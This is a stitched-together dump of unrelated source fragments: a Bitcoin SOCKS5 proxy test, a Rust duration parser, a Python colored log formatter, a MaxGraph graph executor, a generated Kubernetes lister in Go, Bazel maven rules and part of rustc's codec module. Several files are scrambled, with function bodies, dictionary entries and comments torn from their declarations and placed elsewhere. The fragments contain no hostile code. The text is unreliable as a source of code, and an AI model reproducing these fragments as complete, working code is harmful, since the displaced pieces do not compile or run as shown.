# test RPC getnetworkinfo n0 = networks_dict(self.nodes[0].getnetworkinfo()) for net in ['ipv4','ipv6','onion']: assert_equal(n0[net]['proxy'], '%s:%i' % (self.conf1.addr)) assert_equal(n0[net]['proxy_randomize_credentials'], True) assert_equal(n0['onion']['reachable'], True) n1 = networks_dict(self.nodes[1].getnetworkinfo()) for net in ['ipv4','ipv6']: assert_equal(n1[net]['proxy'], '%s:%i' % (self.conf1.addr)) assert_equal(n1[net]['proxy_randomize_credentials'], False) assert_equal(n1['onion']['proxy'], '%s:%i' % (self.conf2.addr)) assert_equal(n1['onion']['proxy_randomize_credentials'], False) assert_equal(n1['onion']['reachable'], True) n2 = networks_dict(self.nodes[2].getnetworkinfo()) for net in ['ipv4','ipv6','onion']: assert_equal(n2[net]['proxy'], '%s:%i' % (self.conf2.addr)) assert_equal(n2[net]['proxy_randomize_credentials'], True) assert_equal(n2['onion']['reachable'], True) if self.have_ipv6: n3 = networks_dict(self.nodes[3].getnetworkinfo()) for net in ['ipv4','ipv6']: assert_equal(n3[net]['proxy'], '[%s]:%i' % (self.conf3.addr)) assert_equal(n3[net]['proxy_randomize_credentials'], False) assert_equal(n3['onion']['reachable'], False) if __name__ == '__main__': ProxyTest().main()
r = {} for x in d['networks']: r[x['name']] = x return r
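The -proxyrandomize assertion above depends on each proxied connection presenting distinct SOCKS5 credentials, which is what puts every connection on its own Tor circuit. A small standalone sketch of the same uniqueness check, using a hypothetical stand-in for the Socks5Command records collected by node_test:

from collections import namedtuple

# Hypothetical stand-in for the Socks5Command objects returned by the proxy threads.
Socks5Cmd = namedtuple("Socks5Cmd", ["addr", "username", "password"])

commands = [
    Socks5Cmd(b"15.61.23.23", "user-a", "pass-a"),
    Socks5Cmd(b"bitcoinostk4e4re.onion", "user-b", "pass-b"),
    Socks5Cmd(b"node.noumenon", "user-c", "pass-c"),
]

# Same check as run_test(): randomized credentials must never repeat across connections.
credentials = set((cmd.username, cmd.password) for cmd in commands)
assert len(credentials) == len(commands)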
duration.rs
use *; pub fn parse_duration(s: &str) -> Result<std::time::Duration, <u64 as FromStr>::Err> { Ok(std::time::Duration::from_millis(s.parse()?)) } pub enum
{ Some(std::time::Duration), Infinite, } impl FromStr for Duration { type Err = <u64 as FromStr>::Err; fn from_str(s: &str) -> Result<Self, Self::Err> { if s == "infinite" || s == "inf" { Ok(Duration::Infinite) } else { Ok(Duration::Some(parse_duration(s)?)) } } } pub fn to_millis(duration: std::time::Duration) -> u64 { duration.as_secs() * 1000 + duration.subsec_millis() as u64 }
Duration
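The parsing rule above is small: the strings "infinite" and "inf" select the unbounded variant, anything else must be an integer number of milliseconds. An illustrative Python translation (not part of the crate; names are invented):

from datetime import timedelta
from typing import Optional

def parse_duration(s: str) -> Optional[timedelta]:
    """Return None for 'infinite'/'inf' (the Infinite variant), else a millisecond duration."""
    if s in ("infinite", "inf"):
        return None
    return timedelta(milliseconds=int(s))  # int() raises ValueError, mirroring the u64 parse error

assert parse_duration("1500") == timedelta(milliseconds=1500)
assert parse_duration("inf") is None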
color_format.py
""" Created by Epic at 10/13/20 Original script by FireDiscordBot on GitHub """ import logging from copy import copy from logging import Logger, DEBUG import sys BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8) RESET_SEQ = "\033[0m" COLOR_SEQ = "\033[1;%dm" BOLD_SEQ = "\033[1m" def getcolor(color=None): return COLOR_SEQ % (30 + (color or WHITE)) def formatter_message(message): for k, v in COLORS.items(): message = message.replace(k, v) return message
"INFO": GREEN, "DEBUG": BLUE, "CRITICAL": YELLOW, "ERROR": RED } COLORS = { "$GREEN": getcolor(GREEN), "$BLUE": getcolor(BLUE), "$RED": getcolor(RED), "$YELLOW": getcolor(YELLOW), "$BLACK": getcolor(BLACK), "$MAGENTA": getcolor(MAGENTA), "$CYAN": getcolor(CYAN), "$WHITE": getcolor(WHITE), "$RESET": RESET_SEQ, "$BOLD": BOLD_SEQ } class ColoredFormatter(logging.Formatter): def __init__(self, msg): super().__init__(msg) def format(self, record): record = copy(record) levelname = record.levelname if levelname in LEVELS: levelname_color = COLOR_SEQ % (30 + LEVELS[levelname]) + levelname + RESET_SEQ record.levelname = levelname_color for k, v in COLORS.items(): record.msg = str(record.msg).replace(k, v) return super().format(record) def basicConfig(logger: Logger): stdout = logging.StreamHandler(sys.stdout) stdout.setLevel(DEBUG) color_format = formatter_message( "[$BOLD%(name)s$RESET][%(levelname)s] %(message)s $RESET($BOLD%(filename)s$RESET:%(lineno)d)") stdout.setFormatter(ColoredFormatter(color_format)) logger.addHandler(stdout)
LEVELS = { "WARNING": YELLOW,
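The formatter above is plain ANSI escape handling: a placeholder such as $RED expands to COLOR_SEQ % (30 + RED), i.e. "\033[1;31m", and $RESET restores the default attributes. A minimal self-contained sketch of that substitution, with invented helper names, independent of the logging classes above:

BLACK, RED, GREEN, YELLOW, BLUE, MAGENTA, CYAN, WHITE = range(8)
RESET_SEQ = "\033[0m"
COLOR_SEQ = "\033[1;%dm"   # 30 + color code selects the foreground color

placeholders = {
    "$RED": COLOR_SEQ % (30 + RED),
    "$GREEN": COLOR_SEQ % (30 + GREEN),
    "$RESET": RESET_SEQ,
}

def colorize(message: str) -> str:
    # Same idea as formatter_message()/ColoredFormatter.format(): textual placeholder -> escape code.
    for placeholder, seq in placeholders.items():
        message = message.replace(placeholder, seq)
    return message

print(colorize("$GREENok$RESET and $REDfailed$RESET"))  # green "ok", red "failed" on an ANSI terminal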
executor.rs
// //! Copyright 2020 Alibaba Group Holding Limited. //! //! Licensed under the Apache License, Version 2.0 (the "License"); //! you may not use this file except in compliance with the License. //! You may obtain a copy of the License at //! //! http://www.apache.org/licenses/LICENSE-2.0 //! //! Unless required by applicable law or agreed to in writing, software //! distributed under the License is distributed on an "AS IS" BASIS, //! WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. //! See the License for the specific language governing permissions and //! limitations under the License. #![allow(bare_trait_objects)] extern crate futures; extern crate grpcio; #[macro_use] extern crate log; extern crate log4rs; extern crate maxgraph_common; extern crate maxgraph_runtime; extern crate maxgraph_store; extern crate maxgraph_server; extern crate protobuf; extern crate structopt; extern crate pegasus; use std::sync::mpsc::{channel, Sender}; use std::sync::{Arc, Mutex, RwLock}; use std::thread; use std::time::Duration; use std::env; use maxgraph_common::proto::query_flow::*; use maxgraph_common::proto::hb::*; use maxgraph_runtime::server::manager::*; use maxgraph_runtime::server::query_manager::*; use maxgraph_common::util::log4rs::init_log4rs; use maxgraph_store::config::{StoreConfig}; use maxgraph_store::api::prelude::*; use protobuf::Message; use maxgraph_common::util; use maxgraph_runtime::{server::RuntimeInfo}; use grpcio::{ServerBuilder, EnvBuilder}; use grpcio::ChannelBuilder; use grpcio::Environment; use grpcio::Server; use maxgraph_runtime::rpc::*; use maxgraph_common::proto::data::*; use rpc_pegasus::ctrl_service::MaxGraphCtrlServiceImpl as PegasusCtrlService; use rpc_pegasus::async_maxgraph_service::AsyncMaxGraphServiceImpl as PegasusAsyncService; use rpc_pegasus::maxgraph_service::MaxGraphServiceImpl as PegasusService; use std::sync::atomic::AtomicBool; use maxgraph_runtime::utils::get_lambda_service_client; use maxgraph_runtime::store::remote_store_service::RemoteStoreServiceManager; use maxgraph_store::api::graph_partition::{GraphPartitionManager}; use maxgraph_runtime::store::ffi::{GlobalVertex, GlobalVertexIter, FFIEdge, GlobalEdgeIter}; use maxgraph_server::StoreContext; fn main() { if let Some(_) = env::args().find(|arg| arg == "--show-build-info") { util::get_build_info(); return; } init_log4rs(); let mut store_config = { let args: Vec<String> = std::env::args().collect(); if args.len() <= 5 && args[1] == "--config" { StoreConfig::init_from_file(&args[2], &args[4]) } else { StoreConfig::init() } }; let (alive_id, partitions) = get_init_info(&store_config); info!("partitions: {:?}", partitions); store_config.update_alive_id(alive_id); info!("{:?}", store_config); let worker_num = store_config.timely_worker_per_process; let store_config = Arc::new(store_config); if cfg!(target_os = "linux") { info!("Start executor with vineyard graph object id {:?}", store_config.vineyard_graph_id); use maxgraph_runtime::store::ffi::FFIGraphStore; let ffi_store = FFIGraphStore::new(store_config.vineyard_graph_id, worker_num as i32); let partition_manager = ffi_store.get_partition_manager(); run_main(store_config, Arc::new(ffi_store), Arc::new(partition_manager)); } else { unimplemented!("Mac not support vineyard graph") } } fn run_main(store_config: Arc<StoreConfig>, vineyard_graph: Arc<GlobalGraphQuery<V=GlobalVertex, E=FFIEdge, VI=GlobalVertexIter, EI=GlobalEdgeIter>>, partition_manager: Arc<GraphPartitionManager>) { let process_partition_list = 
partition_manager.get_process_partition_list(); let runtime_info = Arc::new(Mutex::new(RuntimeInfo::new(store_config.timely_worker_per_process, process_partition_list))); let runtime_info_clone = runtime_info.clone(); let (hb_resp_sender, hb_resp_receiver) = channel(); let query_manager = QueryManager::new(); let server_manager: Box<dyn ServerManager<Data=Vec<u8>>>; let ctrl_service; let async_maxgraph_service; let maxgraph_service; info!("Start pegasus ........"); let remote_store_service_manager = Arc::new(RwLock::new(Some(RemoteStoreServiceManager::empty()))); info!("is lambda enabled: {}", store_config.lambda_enabled); let lambda_service_client = if store_config.lambda_enabled { get_lambda_service_client() } else { None }; let signal = Arc::new(AtomicBool::new(false)); let pegasus_server_manager = PegasusServerManager::new(hb_resp_receiver, runtime_info, remote_store_service_manager.clone(), signal.clone()); let pegasus_runtime = pegasus_server_manager.get_server(); let task_partition_manager = pegasus_server_manager.get_task_partition_manager(); ctrl_service = PegasusCtrlService::new_service(query_manager.clone(), pegasus_runtime.clone()); async_maxgraph_service = PegasusAsyncService::new_service(store_config.clone(), pegasus_runtime.clone(), query_manager.clone(), remote_store_service_manager, lambda_service_client, signal, vineyard_graph.clone(), partition_manager.clone(), task_partition_manager); maxgraph_service = PegasusService::new_service(store_config.clone(), query_manager.clone()); server_manager = Box::new(pegasus_server_manager); let ctrl_and_async_server = start_ctrl_and_async_service(0, ctrl_service, async_maxgraph_service).expect("Start ctrl and async service error."); info!("async maxgraph service and control service bind to: {:?}", ctrl_and_async_server.bind_addrs()); let ctrl_and_async_service_port = ctrl_and_async_server.bind_addrs()[0].1; let store_context = StoreContext::new(vineyard_graph, partition_manager); start_rpc_service(runtime_info_clone, store_config.clone(), maxgraph_service, ctrl_and_async_service_port, hb_resp_sender, store_context); let _manager_guards = ServerManager::start_server(server_manager, store_config, Box::new(recover_prepare)).unwrap(); thread::sleep(Duration::from_secs(u64::max_value())); ::std::mem::drop(ctrl_and_async_server) } fn recover_prepare(prepared: &[u8]) -> Result<Vec<u8>, String>
fn start_rpc_service<VV, VVI, EE, EEI>(runtime_info: Arc<Mutex<RuntimeInfo>>, store_config: Arc<StoreConfig>, maxgraph_service: grpcio::Service, ctrl_and_async_service_port: u16, hb_resp_sender: Sender<Arc<ServerHBResp>>, store_context: StoreContext<VV, VVI, EE, EEI>) where VV: 'static + Vertex, VVI: 'static + Iterator<Item=VV>, EE: 'static + Edge, EEI: 'static + Iterator<Item=EE> { // build hb information let mut hb_providers = Vec::new(); let mut hb_resp_senders = Vec::new(); let hb_provider = move |ref mut server_hb_req: &mut ServerHBReq| { server_hb_req.set_runtimeReq(build_runtime_req(runtime_info.clone())); server_hb_req.mut_endpoint().set_runtimCtrlAndAsyncPort(ctrl_and_async_service_port as i32); }; hb_providers.push(Box::new(hb_provider)); hb_resp_senders.push(hb_resp_sender); let store_config_clone = store_config.clone(); let rpc_service_generator = move |_store| { let service = maxgraph_service; Some(service) }; maxgraph_server::init_with_rpc_service(store_config_clone, rpc_service_generator, hb_providers, hb_resp_senders, store_context); } fn start_ctrl_and_async_service(port: u16, ctrl_service: grpcio::Service, async_maxgraph_service: grpcio::Service) -> Result<Server, String> { let env = Arc::new(Environment::new(1)); let server_builder = ServerBuilder::new(env.clone()) .channel_args(ChannelBuilder::new(env).reuse_port(false).build_args()) .register_service(async_maxgraph_service) .register_service(ctrl_service) .bind("0.0.0.0", port); let mut server = server_builder.build().map_err(|err| format!("Error when build rpc server: {:?}", err))?; server.start(); Ok(server) } fn build_runtime_req(runtime_info: Arc<Mutex<RuntimeInfo>>) -> RuntimeHBReq { let hb_req = runtime_info.lock().expect("Lock runtime hb req failed"); let mut runtime_req = RuntimeHBReq::new(); runtime_req.set_serverStatus(hb_req.get_server_status()); runtime_req.set_runtimePort(hb_req.get_server_port() as i32); runtime_req.set_worker_num_per_process(hb_req.get_worker_num_per_process()); runtime_req.set_process_partition_list(hb_req.get_process_partition_list().to_vec()); info!("Build runtime request {:?} in heartbeat", &runtime_req); runtime_req } /// return: (aliveId, partiiton assignments) fn get_init_info(config: &StoreConfig) -> (u64, Vec<PartitionId>) { use maxgraph_server::client::ZKClient; use maxgraph_common::proto::data_grpc::*; use maxgraph_common::util::ip; let zk_url = format!("{}/{}", config.zk_url, config.graph_name); let zk = ZKClient::new(&zk_url, config.zk_timeout_ms, config.get_zk_auth()); let addr = zk.get_coordinator_addr(); let channel = ChannelBuilder::new(Arc::new(EnvBuilder::new().build())) .connect(addr.to_string().as_str()); let client = ServerDataApiClient::new(channel); let mut request = GetExecutorAliveIdRequest::new(); request.set_serverId(config.worker_id); request.set_ip(ip::get_local_ip()); let response = client.get_executor_alive_id(&request).unwrap(); let alive_id = response.get_aliveId(); let mut request = GetPartitionAssignmentRequest::new(); request.set_serverId(config.worker_id); let response = client.get_partition_assignment(&request).unwrap(); let partitions = response.get_partitionId().to_vec(); (alive_id, partitions) }
{ ::protobuf::parse_from_bytes::<QueryFlow>(prepared) .map_err(|err| err.to_string()) .and_then(move |desc| { info!("parse {} bytes to {:?} ", prepared.len(), desc); Ok(desc.write_to_bytes().expect("query flow to bytes")) }) }
repositorypermissionspolicy.go
/* Copyright AppsCode Inc. and Contributors Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except in compliance with the License. You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0 Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License. */ // Code generated by lister-gen. DO NOT EDIT. package v1alpha1 import ( v1alpha1 "kubeform.dev/provider-aws-api/apis/codeartifact/v1alpha1" "k8s.io/apimachinery/pkg/api/errors" "k8s.io/apimachinery/pkg/labels" "k8s.io/client-go/tools/cache" ) // RepositoryPermissionsPolicyLister helps list RepositoryPermissionsPolicies. // All objects returned here must be treated as read-only. type RepositoryPermissionsPolicyLister interface { // List lists all RepositoryPermissionsPolicies in the indexer. // Objects returned here must be treated as read-only. List(selector labels.Selector) (ret []*v1alpha1.RepositoryPermissionsPolicy, err error) // RepositoryPermissionsPolicies returns an object that can list and get RepositoryPermissionsPolicies. RepositoryPermissionsPolicies(namespace string) RepositoryPermissionsPolicyNamespaceLister RepositoryPermissionsPolicyListerExpansion } // repositoryPermissionsPolicyLister implements the RepositoryPermissionsPolicyLister interface. type repositoryPermissionsPolicyLister struct { indexer cache.Indexer } // NewRepositoryPermissionsPolicyLister returns a new RepositoryPermissionsPolicyLister. func NewRepositoryPermissionsPolicyLister(indexer cache.Indexer) RepositoryPermissionsPolicyLister
// List lists all RepositoryPermissionsPolicies in the indexer. func (s *repositoryPermissionsPolicyLister) List(selector labels.Selector) (ret []*v1alpha1.RepositoryPermissionsPolicy, err error) { err = cache.ListAll(s.indexer, selector, func(m interface{}) { ret = append(ret, m.(*v1alpha1.RepositoryPermissionsPolicy)) }) return ret, err } // RepositoryPermissionsPolicies returns an object that can list and get RepositoryPermissionsPolicies. func (s *repositoryPermissionsPolicyLister) RepositoryPermissionsPolicies(namespace string) RepositoryPermissionsPolicyNamespaceLister { return repositoryPermissionsPolicyNamespaceLister{indexer: s.indexer, namespace: namespace} } // RepositoryPermissionsPolicyNamespaceLister helps list and get RepositoryPermissionsPolicies. // All objects returned here must be treated as read-only. type RepositoryPermissionsPolicyNamespaceLister interface { // List lists all RepositoryPermissionsPolicies in the indexer for a given namespace. // Objects returned here must be treated as read-only. List(selector labels.Selector) (ret []*v1alpha1.RepositoryPermissionsPolicy, err error) // Get retrieves the RepositoryPermissionsPolicy from the indexer for a given namespace and name. // Objects returned here must be treated as read-only. Get(name string) (*v1alpha1.RepositoryPermissionsPolicy, error) RepositoryPermissionsPolicyNamespaceListerExpansion } // repositoryPermissionsPolicyNamespaceLister implements the RepositoryPermissionsPolicyNamespaceLister // interface. type repositoryPermissionsPolicyNamespaceLister struct { indexer cache.Indexer namespace string } // List lists all RepositoryPermissionsPolicies in the indexer for a given namespace. func (s repositoryPermissionsPolicyNamespaceLister) List(selector labels.Selector) (ret []*v1alpha1.RepositoryPermissionsPolicy, err error) { err = cache.ListAllByNamespace(s.indexer, s.namespace, selector, func(m interface{}) { ret = append(ret, m.(*v1alpha1.RepositoryPermissionsPolicy)) }) return ret, err } // Get retrieves the RepositoryPermissionsPolicy from the indexer for a given namespace and name. func (s repositoryPermissionsPolicyNamespaceLister) Get(name string) (*v1alpha1.RepositoryPermissionsPolicy, error) { obj, exists, err := s.indexer.GetByKey(s.namespace + "/" + name) if err != nil { return nil, err } if !exists { return nil, errors.NewNotFound(v1alpha1.Resource("repositorypermissionspolicy"), name) } return obj.(*v1alpha1.RepositoryPermissionsPolicy), nil }
{ return &repositoryPermissionsPolicyLister{indexer: indexer} }
maven.bzl
load(":functions.bzl", "create_option_file", "explicit_target") def _maven_pom_impl(ctx): # Contains both *.jar and *.aar files. jars = depset() # classfied jars. Sources are in clsjars["sources"] clsjars = {} # classifier -> depset(jars) clsjars["sources"] = depset() if ctx.attr.library: if ctx.attr.file or ctx.attr.classified_files: fail("Cannot set both file and library for a maven_pom.") jars = depset([jar.class_jar for jar in ctx.attr.library.java.outputs.jars], transitive = [jars]) clsjars["sources"] = depset(ctx.attr.library.java.source_jars.to_list(), transitive = [clsjars["sources"]]) for classifier, library in zip(ctx.attr.classifiers, ctx.attr.classified_libraries): if classifier not in clsjars: clsjars[classifier] = depset() clsjars[classifier] = depset(direct = [jar.class_jar for jar in library.java.outputs.jars], transitive = [clsjars[classifier]]) if ctx.attr.file: if ctx.attr.library or ctx.attr.classified_libraries: fail("Cannot set both file and library for a maven_pom.") jars = depset(transitive = [ctx.attr.file.files, jars]) if ctx.attr.classified_files: for classifier, file in zip(ctx.attr.classifiers, ctx.attr.classified_files): if classifier not in clsjars: clsjars[classifier] = depset() clsjars[classifier] = depset(transitive = [file.files, clsjars[classifier]]) if ctx.attr.properties and ctx.files.properties_files: fail("Cannot set both properties and properties_files for a maven_pom.") parent_poms = depset([], order = "postorder") parent_jars = {} parent_clsjars = {} # pom -> classifier -> depset(jars) deps_poms = depset([], order = "postorder") deps_jars = {} deps_clsjars = {} # pom -> classifier -> depset(jars) # Transitive deps through the parent attribute if ctx.attr.parent: parent_poms = depset(transitive = [ctx.attr.parent.maven.parent.poms, parent_poms], order = "postorder") parent_poms = depset(transitive = [ctx.attr.parent.maven.deps.poms, parent_poms], order = "postorder") parent_poms = depset(direct = [ctx.file.parent], transitive = [parent_poms], order = "postorder") parent_jars.update(ctx.attr.parent.maven.parent.jars) parent_jars.update(ctx.attr.parent.maven.deps.jars) parent_jars[ctx.file.parent] = ctx.attr.parent.maven.jars parent_clsjars.update(ctx.attr.parent.maven.parent.clsjars) parent_clsjars.update(ctx.attr.parent.maven.deps.clsjars) parent_clsjars[ctx.file.parent] = ctx.attr.parent.maven.clsjars elif hasattr(ctx.attr.source, "maven"): parent_poms = ctx.attr.source.maven.parent.poms parent_jars = ctx.attr.source.maven.parent.jars parent_clsjars = ctx.attr.source.maven.parent.clsjars # Transitive deps through deps if ctx.attr.deps: for label in ctx.attr.deps: deps_poms = depset(transitive = [label.maven.parent.poms, deps_poms], order = "postorder") deps_poms = depset(transitive = [label.maven.deps.poms, deps_poms], order = "postorder") deps_poms = depset(direct = [label.maven.pom], transitive = [deps_poms], order = "postorder") deps_jars.update(label.maven.parent.jars) deps_jars.update(label.maven.deps.jars) deps_jars[label.maven.pom] = label.maven.jars deps_clsjars.update(label.maven.parent.clsjars) deps_clsjars.update(label.maven.deps.clsjars) deps_clsjars[label.maven.pom] = label.maven.clsjars elif hasattr(ctx.attr.source, "maven"): deps_poms = ctx.attr.source.maven.deps.poms deps_jars = ctx.attr.source.maven.deps.jars deps_clsjars = ctx.attr.source.maven.deps.clsjars inputs = [] args = [] # Input file to take as base if ctx.file.source: args += ["-i", ctx.file.source.path] inputs += [ctx.file.source] # Output file args += ["-o", 
ctx.outputs.pom.path] args += ["-x"] if ctx.attr.export_pom else [] # Overrides if ctx.attr.group: args += ["--group", ctx.attr.group] if ctx.attr.artifact: args += ["--artifact", ctx.attr.artifact] if ctx.attr.version: args += ["--version", ctx.attr.version] if ctx.attr.properties: args += ["--properties", ctx.file.properties.path] inputs += [ctx.file.properties] if ctx.files.properties_files: args += ["--properties", ":".join([file.path for file in ctx.files.properties_files])] inputs += ctx.files.properties_files if ctx.attr.version_property: args += ["--version_property", ctx.attr.version_property] # Exclusions for (dependency, exclusions) in ctx.attr.exclusions.items(): args += ["--exclusion", dependency, ",".join([e for e in exclusions])] args += ["--deps", ":".join([dep.path for dep in ctx.files.deps])] inputs += ctx.files.deps ctx.actions.run( mnemonic = "GenPom", inputs = inputs, outputs = [ctx.outputs.pom], arguments = args, executable = ctx.executable._pom, ) return struct(maven = struct( parent = struct( poms = parent_poms, jars = parent_jars, clsjars = parent_clsjars, ), deps = struct( poms = deps_poms, jars = deps_jars, clsjars = deps_clsjars, ), pom = ctx.outputs.pom, jars = jars, clsjars = clsjars, )) maven_pom = rule( attrs = { "deps": attr.label_list(), "library": attr.label( allow_files = True, ), "export_pom": attr.label(), "classifiers": attr.string_list( default = [], ), "classified_libraries": attr.label_list( allow_files = True, default = [], ), "file": attr.label( allow_files = True, ), "classified_files": attr.label_list( allow_files = True, default = [], ), "group": attr.string(), "version": attr.string(), "artifact": attr.string(), "source": attr.label( allow_single_file = True, ), "properties": attr.label( allow_single_file = True, ), "properties_files": attr.label_list( allow_files = True, default = [], ), "version_property": attr.string(), "parent": attr.label( allow_single_file = True, ), "exclusions": attr.string_list_dict(), "_pom": attr.label( executable = True, cfg = "host", default = Label("//tools/base/bazel:pom_generator"), allow_files = True, ), }, outputs = { "pom": "%{name}.pom", }, implementation = _maven_pom_impl, ) # A java library that can be used in a maven_repo rule. # # Usage: # maven_java_library( # name = "name", # deps = A list of maven_java_library or maven_java_import dependencies # # all java_library attriutes # info = A maven coordinate for this artifact as a string # ) def maven_java_library( name, deps = None, runtime_deps = None, exclusions = None, export_artifact = None, srcs = None, resources = [], exports = None, pom = None, visibility = None, **kwargs): if srcs and export_artifact: fail("Ony one of [srcs, export_artifact] can be used at a time") if export_artifact and pom: fail("If export_artifact is specified, the maven information cannot be changed.") java_exports = exports + [export_artifact] if export_artifact else exports native.java_library( name = name, deps = deps, runtime_deps = runtime_deps, srcs = srcs, resources = native.glob(["NOTICE", "LICENSE"]) + resources, exports = java_exports, visibility = visibility, **kwargs ) # TODO: Properly exclude libraries from the pom instead of using _neverlink hacks. 
maven_deps = (deps or []) + (exports or []) + (runtime_deps or []) maven_pom( name = name + "_maven", deps = [explicit_target(dep) + "_maven" for dep in maven_deps if not dep.endswith("_neverlink")] if maven_deps else None, exclusions = exclusions, library = export_artifact if export_artifact else name, visibility = visibility, source = explicit_target(export_artifact) + "_maven" if export_artifact else pom, export_pom = explicit_target(export_artifact) + "_maven" if export_artifact else None, ) def _import_with_license_impl(ctx): names = [] for jar in ctx.attr.dep[DefaultInfo].files.to_list(): name = jar.basename if jar.extension: name = jar.basename[:-len(jar.extension) - 1] names.append(name) return struct( providers = [ctx.attr.dep[JavaInfo], ctx.attr.dep[DefaultInfo]], java = ctx.attr.dep.java, notice = struct( file = ctx.attr.notice, name = ",".join(names), ), ) import_with_license = rule( implementation = _import_with_license_impl, attrs = { "dep": attr.label(), "notice": attr.label(allow_files = True), }, ) # A java_import rule extended with pom and parent attributes for maven libraries. def maven_java_import(name, pom, classifiers = [], visibility = None, jars = [], **kwargs): native.java_import( name = name + "_import", jars = jars, **kwargs ) import_with_license( name = name, visibility = visibility, dep = name + "_import", notice = "NOTICE", tags = ["require_license"], ) classified_libraries = [] for classifier in classifiers: native.java_import( name = classifier + "-" + name, visibility = visibility, jars = [jar.replace(".jar", "-" + classifier + ".jar") for jar in jars], **kwargs ) classified_libraries += [classifier + "-" + name] maven_pom( name = name + "_maven", library = name, classifiers = classifiers, classified_libraries = classified_libraries, visibility = visibility, source = pom, ) def maven_aar(name, aar, pom, visibility = None): native.filegroup( name = name, srcs = [aar], visibility = visibility, ) maven_pom( name = name + "_maven", file = aar, visibility = visibility, source = pom, ) def _maven_repo_impl(ctx): include_sources = ctx.attr.include_sources seen = {} inputs = [] args = [] for artifact in ctx.attr.artifacts: if not seen.get(artifact.maven.pom): for pom in artifact.maven.parent.poms.to_list(): jars = artifact.maven.parent.jars[pom] if not seen.get(pom): inputs += [pom] + jars.to_list() args += [pom.path] + [jar.path for jar in jars.to_list()] clsjars = artifact.maven.parent.clsjars[pom] for classifier in clsjars: inputs += clsjars[classifier].to_list() args += [jar.path + ":" + classifier for jar in clsjars[classifier].to_list()] seen[pom] = True inputs += [artifact.maven.pom] + artifact.maven.jars.to_list() args += [artifact.maven.pom.path] + [jar.path for jar in artifact.maven.jars.to_list()] for classifier in artifact.maven.clsjars: inputs += artifact.maven.clsjars[classifier].to_list() args += [jar.path + ":" + classifier for jar in artifact.maven.clsjars[classifier].to_list()] seen[artifact.maven.pom] = True for pom in artifact.maven.deps.poms.to_list(): jars = artifact.maven.deps.jars[pom] if not seen.get(pom): inputs += [pom] + jars.to_list() args += [pom.path] + [jar.path for jar in jars.to_list()] if include_sources: clsjars = artifact.maven.deps.clsjars[pom] inputs += clsjars[classifier].to_list() args += [jar.path + ":" + classifier for jar in clsjars[classifier].to_list()] seen[pom] = True # Execute the command option_file = create_option_file( ctx, ctx.outputs.repo.path + ".lst", "\n".join(args), ) ctx.actions.run( inputs = inputs + 
[option_file], outputs = [ctx.outputs.repo], mnemonic = "mavenrepo", executable = ctx.executable._repo, arguments = [ctx.outputs.repo.path, "@" + option_file.path], ) _maven_repo = rule( attrs = { "artifacts": attr.label_list(), "include_sources": attr.bool(), "_repo": attr.label( executable = True, cfg = "host", default = Label("//tools/base/bazel:repo_builder"), allow_files = True, ), }, outputs = { "repo": "%{name}.zip", }, implementation = _maven_repo_impl,
# dependencies. # # Usage: # maven_repo( # name = The name of the rule. The output of the rule will be ${name}.zip. # artifacts = A list of all maven_java_libraries to add to the repo. # include_sources = Add source jars to the repo as well (useful for tests). # ) def maven_repo(artifacts = [], include_sources = False, **kwargs): _maven_repo( artifacts = [explicit_target(artifact) + "_maven" for artifact in artifacts], include_sources = include_sources, **kwargs )
) # Creates a maven repo with the given artifacts and all their transitive
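Putting the macros together, a BUILD file would typically declare a library with its pom source and then bundle it, plus its transitive deps, into a repository zip. The snippet below is an illustrative Starlark sketch; the target names, file names, and the load path //tools/base/bazel:maven.bzl are assumptions, not taken from this file:

load("//tools/base/bazel:maven.bzl", "maven_java_library", "maven_repo")  # assumed location of this .bzl file

maven_java_library(
    name = "mylib",                       # hypothetical library target
    srcs = glob(["src/**/*.java"]),
    deps = ["//some/other:dep"],          # each dep needs a matching <dep>_maven target
    pom = "mylib.pom",                    # hypothetical pom template passed through as 'source'
)

maven_repo(
    name = "mylib_repo",                  # produces mylib_repo.zip
    artifacts = [":mylib"],
    include_sources = True,
)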
codec.rs
// This module contains some shared code for encoding and decoding various // things from the `ty` module, and in particular implements support for // "shorthands" which allow pointers back into the already encoded // stream instead of re-encoding the same thing twice. // // The functionality in here is shared between persisting to crate metadata and // persisting to incr. comp. caches. use crate::arena::ArenaAllocatable; use crate::infer::canonical::{CanonicalVarInfo, CanonicalVarInfos};
self, interpret::{AllocId, Allocation}, }; use crate::ty::subst::SubstsRef; use crate::ty::{self, List, Ty, TyCtxt}; use rustc_data_structures::fx::FxHashMap; use rustc_hir::def_id::{CrateNum, DefId}; use rustc_serialize::{Decodable, Decoder, Encodable, Encoder}; use rustc_span::Span; use std::hash::Hash; use std::intrinsics; use std::marker::DiscriminantKind; /// The shorthand encoding uses an enum's variant index `usize` /// and is offset by this value so it never matches a real variant. /// This offset is also chosen so that the first byte is never < 0x80. pub const SHORTHAND_OFFSET: usize = 0x80; pub trait EncodableWithShorthand<'tcx, E: TyEncoder<'tcx>>: Copy + Eq + Hash { type Variant: Encodable<E>; fn variant(&self) -> &Self::Variant; } #[allow(rustc::usage_of_ty_tykind)] impl<'tcx, E: TyEncoder<'tcx>> EncodableWithShorthand<'tcx, E> for Ty<'tcx> { type Variant = ty::TyKind<'tcx>; #[inline] fn variant(&self) -> &Self::Variant { self.kind() } } impl<'tcx, E: TyEncoder<'tcx>> EncodableWithShorthand<'tcx, E> for ty::PredicateKind<'tcx> { type Variant = ty::PredicateKind<'tcx>; #[inline] fn variant(&self) -> &Self::Variant { self } } pub trait TyEncoder<'tcx>: Encoder { const CLEAR_CROSS_CRATE: bool; fn position(&self) -> usize; fn type_shorthands(&mut self) -> &mut FxHashMap<Ty<'tcx>, usize>; fn predicate_shorthands(&mut self) -> &mut FxHashMap<ty::PredicateKind<'tcx>, usize>; fn encode_alloc_id(&mut self, alloc_id: &AllocId) -> Result<(), Self::Error>; } /// Trait for decoding to a reference. /// /// This is a separate trait from `Decodable` so that we can implement it for /// upstream types, such as `FxHashSet`. /// /// The `TyDecodable` derive macro will use this trait for fields that are /// references (and don't use a type alias to hide that). /// /// `Decodable` can still be implemented in cases where `Decodable` is required /// by a trait bound. pub trait RefDecodable<'tcx, D: TyDecoder<'tcx>> { fn decode(d: &mut D) -> Result<&'tcx 